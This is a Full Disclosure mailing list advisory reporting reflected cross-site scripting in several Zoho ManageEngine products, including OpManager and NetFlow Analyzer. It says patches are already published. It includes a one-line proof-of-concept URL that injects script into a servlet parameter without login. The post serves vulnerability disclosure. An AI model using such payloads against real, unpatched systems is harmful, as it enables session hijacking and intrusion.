This issue has been reported to the vendor who has already published patches for this issue. http://opmanager.helpdocsonline.com/read-me ========================== Advisory: Zoho manageengine Reflected XSS in multiple Products Author: M3 From DBAppSecurity Affected Products: Netflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer ========================== Proof of Concept: ========================== /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script Notice: This vul can reproduce without login.
Attachment:
4444.png
Description: Binary data
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/